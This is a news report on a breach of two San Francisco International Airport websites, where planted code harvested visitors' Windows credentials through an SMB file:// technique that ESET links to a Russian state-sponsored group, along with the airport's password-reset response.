State-sponsored Russian actors said to have taken off with sensitive user data

San Francisco International Airport (SFO) has warned that a breach against two of its websites may have allowed attackers to harvest visiting users’ Windows login credentials.

Malicious code was planted last month on two sites – and – as the result of a cyber-attack by unidentified (or at least unnamed) assailants, the airport admitted late last week.

“The attackers inserted malicious computer code on these websites to steal some users’ login credentials,” a breach notice from SFO explains.

“Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO.”

“It appears the attackers may have accessed the impacted users’ usernames and passwords used to log on to those personal devices,” it added.

Fly-by-night attack

In response to the incident, SFO took down the two affected websites before scrubbing them clean of malicious code.

The website has been restored, while the site, which contains a front page link to the breach notice, is described as being “under maintenance”.

A holding page on the site offers advice on how to get more information on SFO construction projects, bids, and contracts elsewhere on the web.

The airport – which handled more than 57 million passengers last year, making it the seventh busiest in the US – reset all SFO-related email and network passwords late last month, around two weeks before publicly disclosing the breach.

External users who visited the site are advised to reset their Windows device login credentials, as applicable.

Any credentials that use the same username and password combination – a bad practice many nonetheless persist with – also need to be changed.

Security software firm ESET notes that the tactics in play during the attack match those of a threat group known as Dragonfly/Energetic Bear, a Russian state-sponsored hacking crew.

“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” ESET Research said in a post on Twitter.

“Contrary to what several people reported, ESET Research assesses that this attack has no link with any Magecart credential stealer.

“The targeted information was NOT the visitor’s credentials to the compromised websites, but rather the visitor's own Windows credentials.”

CONTINUE READING LA respiratory hospital hit by supplier data breach